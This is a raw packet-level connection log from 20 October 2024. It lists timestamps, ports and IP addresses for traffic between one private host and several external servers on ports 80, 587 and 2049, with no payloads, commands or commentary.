Oct 20, 2024 18:41:26.351676941 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:26.351949930 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:26.351977110 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:26.352005005 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:26.357876062 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.357894897 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.357906103 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.357918024 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.357943058 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.357954025 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.357964993 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.357976913 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.358083010 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.358095884 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.358105898 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.358396053 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.507432938 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.514503956 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:26.520575047 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.520595074 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.520606995 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.520678997 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.520692110 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.520705938 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.520843029 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.520857096 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.676012993 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.719216108 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:26.726713896 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.728327036 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:26.733453989 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.939264059 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.970937967 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:26.977103949 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:27.299091101 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:27.301922083 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:27.309243917 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:27.518170118 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:27.520050049 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:27.525198936 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:27.574837923 CEST	80	49763	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:27.574923038 CEST	49763	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:27.575092077 CEST	49763	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:27.580583096 CEST	80	49763	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:27.591309071 CEST	80	49764	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:27.591448069 CEST	49764	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:27.591448069 CEST	49764	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:27.596848011 CEST	80	49764	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:27.604074001 CEST	49766	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:27.609088898 CEST	80	49766	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:27.609790087 CEST	49766	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:27.610124111 CEST	49766	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:27.610151052 CEST	49766	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:27.615077972 CEST	80	49766	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:27.615179062 CEST	80	49766	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:27.682755947 CEST	49767	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:27.688014984 CEST	80	49767	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:27.688129902 CEST	49767	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:27.688219070 CEST	49767	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:27.688219070 CEST	49767	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:27.693128109 CEST	80	49767	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:27.693634033 CEST	80	49767	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:27.735516071 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:27.736450911 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:27.743602037 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:27.947458982 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:27.997658014 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:28.002789021 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:28.211922884 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:28.215976954 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:28.221000910 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:28.422091961 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:28.436153889 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:28.443576097 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:28.661123991 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:28.695537090 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:28.979346037 CEST	49767	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:29.066159010 CEST	49769	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:29.074321985 CEST	80	49769	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:29.074397087 CEST	49769	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:29.074515104 CEST	49769	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:29.074528933 CEST	49769	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:29.082036972 CEST	80	49769	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:29.082112074 CEST	80	49769	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:29.147726059 CEST	80	49766	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:29.147825956 CEST	49766	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:29.147878885 CEST	49766	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:29.154033899 CEST	80	49766	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:29.193866014 CEST	49770	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:29.198961973 CEST	80	49770	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:29.199038982 CEST	49770	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:29.199201107 CEST	49770	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:29.199202061 CEST	49770	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:29.204360008 CEST	80	49770	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:29.206056118 CEST	80	49770	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:32.969624996 CEST	49769	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:33.150270939 CEST	49773	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:33.155297041 CEST	80	49773	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:33.155378103 CEST	49773	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:33.155561924 CEST	49773	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:33.155591011 CEST	49773	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:33.160562992 CEST	80	49773	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:33.160922050 CEST	80	49773	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:36.813141108 CEST	80	49770	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:36.813482046 CEST	49770	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:36.813482046 CEST	49770	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:36.818564892 CEST	80	49770	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:36.828142881 CEST	49774	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:36.833163023 CEST	80	49774	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:36.836055994 CEST	49774	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:36.836272001 CEST	49774	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:36.836344957 CEST	49774	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:36.841226101 CEST	80	49774	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:36.841257095 CEST	80	49774	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:36.969274998 CEST	49773	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:37.044925928 CEST	49775	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:37.049968004 CEST	80	49775	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:37.050170898 CEST	49775	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:37.054972887 CEST	49775	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:37.054972887 CEST	49775	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:37.059899092 CEST	80	49775	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:37.059950113 CEST	80	49775	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:40.969481945 CEST	49775	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:41.160187006 CEST	49776	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:41.165230036 CEST	80	49776	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:41.165307999 CEST	49776	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:41.168174982 CEST	49776	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:41.168174982 CEST	49776	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:41.173223019 CEST	80	49776	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:41.173254967 CEST	80	49776	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:42.706300974 CEST	80	49776	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:42.706389904 CEST	49776	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:42.706469059 CEST	49776	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:42.711477041 CEST	80	49776	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:42.883989096 CEST	49777	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:42.888979912 CEST	80	49777	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:42.889069080 CEST	49777	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:42.889202118 CEST	49777	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:42.889226913 CEST	49777	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:42.894246101 CEST	80	49777	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:42.894274950 CEST	80	49777	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:44.431859970 CEST	80	49777	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:44.432096958 CEST	49777	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:44.432296038 CEST	49777	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:44.437099934 CEST	80	49777	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:44.486681938 CEST	80	49774	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:44.486942053 CEST	49774	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:44.486989021 CEST	49774	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:44.491880894 CEST	80	49774	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:44.524362087 CEST	49778	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:44.529264927 CEST	80	49778	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:44.529342890 CEST	49778	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:44.529478073 CEST	49778	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:44.529505968 CEST	49778	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:44.534246922 CEST	80	49778	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:44.534271955 CEST	80	49778	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:44.703218937 CEST	49779	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:44.708095074 CEST	80	49779	13.251.16.150	192.168.2.4
Oct 20, 2024 18:41:44.708180904 CEST	49779	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:44.708328009 CEST	49779	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:44.708328962 CEST	49779	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:44.713231087 CEST	80	49779	13.251.16.150	192.168.2.4
Oct 20, 2024 18:41:44.713252068 CEST	80	49779	13.251.16.150	192.168.2.4
Oct 20, 2024 18:41:46.418765068 CEST	80	49779	13.251.16.150	192.168.2.4
Oct 20, 2024 18:41:46.418881893 CEST	49779	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:46.419878960 CEST	49779	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:46.424748898 CEST	80	49779	13.251.16.150	192.168.2.4
Oct 20, 2024 18:41:46.552648067 CEST	49780	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:46.557631969 CEST	80	49780	13.251.16.150	192.168.2.4
Oct 20, 2024 18:41:46.557729006 CEST	49780	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:46.557861090 CEST	49780	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:46.557861090 CEST	49780	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:46.562711000 CEST	80	49780	13.251.16.150	192.168.2.4
Oct 20, 2024 18:41:46.562741041 CEST	80	49780	13.251.16.150	192.168.2.4
Oct 20, 2024 18:41:48.093826056 CEST	80	49780	13.251.16.150	192.168.2.4
Oct 20, 2024 18:41:48.093890905 CEST	49780	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:48.093929052 CEST	49780	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:41:48.098849058 CEST	80	49780	13.251.16.150	192.168.2.4
Oct 20, 2024 18:41:48.263849974 CEST	49781	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:48.269444942 CEST	80	49781	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:48.269526958 CEST	49781	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:48.269639015 CEST	49781	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:48.269670010 CEST	49781	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:48.274595976 CEST	80	49781	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:48.274610043 CEST	80	49781	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:49.040358067 CEST	49781	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:49.233381987 CEST	49782	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:49.331348896 CEST	80	49781	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:49.331427097 CEST	49781	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:49.332163095 CEST	80	49782	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:49.332250118 CEST	49782	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:49.332478046 CEST	49782	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:49.332515955 CEST	49782	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:49.337378979 CEST	80	49782	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:49.337409019 CEST	80	49782	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:50.242244005 CEST	80	49782	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:50.242352962 CEST	49782	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:50.242490053 CEST	49782	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:50.247483969 CEST	80	49782	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:50.491631031 CEST	49783	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:50.496639013 CEST	80	49783	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:50.496723890 CEST	49783	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:50.496871948 CEST	49783	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:50.496871948 CEST	49783	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:50.501764059 CEST	80	49783	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:50.501794100 CEST	80	49783	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:52.134236097 CEST	80	49783	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:52.134331942 CEST	49783	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:52.148324966 CEST	80	49778	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:52.148411036 CEST	49778	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:52.177129984 CEST	49783	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:52.178000927 CEST	49778	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:52.182017088 CEST	80	49783	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:52.182845116 CEST	80	49778	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:52.221256971 CEST	49784	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:52.226572037 CEST	80	49784	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:52.226649046 CEST	49784	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:52.226824045 CEST	49784	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:52.226839066 CEST	49784	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:52.231705904 CEST	80	49784	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:52.231919050 CEST	80	49784	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:52.376585960 CEST	49785	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:52.381793976 CEST	80	49785	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:52.381879091 CEST	49785	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:52.382006884 CEST	49785	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:52.382006884 CEST	49785	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:52.386917114 CEST	80	49785	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:52.386970997 CEST	80	49785	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:52.953648090 CEST	49785	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:53.113841057 CEST	49786	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:53.118813038 CEST	80	49786	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:53.119074106 CEST	49786	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:53.119260073 CEST	49786	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:53.119286060 CEST	49786	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:53.124401093 CEST	80	49786	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:53.124505043 CEST	80	49786	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:54.905478954 CEST	80	49786	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:54.905561924 CEST	49786	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:54.905608892 CEST	80	49786	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:54.905658960 CEST	49786	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:54.905787945 CEST	80	49786	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:54.905849934 CEST	49786	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:54.906245947 CEST	80	49786	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:54.906374931 CEST	49786	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:54.908839941 CEST	49786	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:54.913686991 CEST	80	49786	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:55.099101067 CEST	49787	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:55.104226112 CEST	80	49787	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:55.104355097 CEST	49787	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:55.104660988 CEST	49787	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:55.104660988 CEST	49787	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:55.109528065 CEST	80	49787	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:55.109544039 CEST	80	49787	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:56.005533934 CEST	80	49787	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:56.008788109 CEST	49787	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:56.008996964 CEST	49787	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:56.013787985 CEST	80	49787	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:56.346103907 CEST	49788	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:56.351073980 CEST	80	49788	34.246.200.160	192.168.2.4
Oct 20, 2024 18:41:56.351152897 CEST	49788	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:56.351519108 CEST	49788	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:56.351542950 CEST	49788	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:56.356317997 CEST	80	49788	34.246.200.160	192.168.2.4
Oct 20, 2024 18:41:56.356332064 CEST	80	49788	34.246.200.160	192.168.2.4
Oct 20, 2024 18:41:57.551229000 CEST	80	49788	34.246.200.160	192.168.2.4
Oct 20, 2024 18:41:57.552431107 CEST	49788	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:57.552431107 CEST	49788	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:57.557219028 CEST	80	49788	34.246.200.160	192.168.2.4
Oct 20, 2024 18:41:57.722098112 CEST	49789	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:57.726955891 CEST	80	49789	34.246.200.160	192.168.2.4
Oct 20, 2024 18:41:57.727425098 CEST	49789	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:57.727570057 CEST	49789	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:57.727596998 CEST	49789	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:57.732321024 CEST	80	49789	34.246.200.160	192.168.2.4
Oct 20, 2024 18:41:57.732355118 CEST	80	49789	34.246.200.160	192.168.2.4
Oct 20, 2024 18:41:58.909445047 CEST	80	49789	34.246.200.160	192.168.2.4
Oct 20, 2024 18:41:58.909516096 CEST	49789	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:58.918920040 CEST	49789	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:41:58.923790932 CEST	80	49789	34.246.200.160	192.168.2.4
Oct 20, 2024 18:41:59.839427948 CEST	80	49784	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:59.839498043 CEST	49784	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:59.839529037 CEST	49784	80	192.168.2.4	82.112.184.197
Oct 20, 2024 18:41:59.844396114 CEST	80	49784	82.112.184.197	192.168.2.4
Oct 20, 2024 18:41:59.949875116 CEST	49791	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:59.954895020 CEST	80	49791	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:59.954956055 CEST	49791	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:59.956516981 CEST	49791	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:59.956516981 CEST	49791	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:41:59.958118916 CEST	49792	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:41:59.961405993 CEST	80	49791	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:59.961422920 CEST	80	49791	47.129.31.212	192.168.2.4
Oct 20, 2024 18:41:59.963119984 CEST	80	49792	18.208.156.248	192.168.2.4
Oct 20, 2024 18:41:59.966768026 CEST	49792	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:41:59.966897011 CEST	49792	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:41:59.966921091 CEST	49792	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:41:59.971723080 CEST	80	49792	18.208.156.248	192.168.2.4
Oct 20, 2024 18:41:59.971735954 CEST	80	49792	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:00.846038103 CEST	80	49792	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:00.846101999 CEST	49792	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:00.848210096 CEST	49792	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:00.853063107 CEST	80	49792	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:00.982909918 CEST	49793	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:00.987926006 CEST	80	49793	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:00.988149881 CEST	49793	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:00.988149881 CEST	49793	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:00.988316059 CEST	49793	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:00.993247986 CEST	80	49793	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:00.993257046 CEST	80	49793	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:01.503232002 CEST	80	49791	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:01.507555962 CEST	49791	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:01.510585070 CEST	49791	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:01.515578032 CEST	80	49791	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:01.686847925 CEST	49799	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:01.691889048 CEST	80	49799	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:01.693802118 CEST	49799	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:01.703905106 CEST	49799	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:01.703905106 CEST	49799	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:01.708790064 CEST	80	49799	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:01.708802938 CEST	80	49799	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:01.893692017 CEST	80	49793	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:01.895023108 CEST	49793	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:01.895611048 CEST	49793	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:01.900437117 CEST	80	49793	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:02.014899015 CEST	49800	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:02.019948006 CEST	80	49800	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:02.020011902 CEST	49800	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:02.020149946 CEST	49800	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:02.020159960 CEST	49800	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:02.024983883 CEST	80	49800	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:02.024996042 CEST	80	49800	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:02.880412102 CEST	80	49800	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:02.922300100 CEST	49800	80	192.168.2.4	208.100.26.245
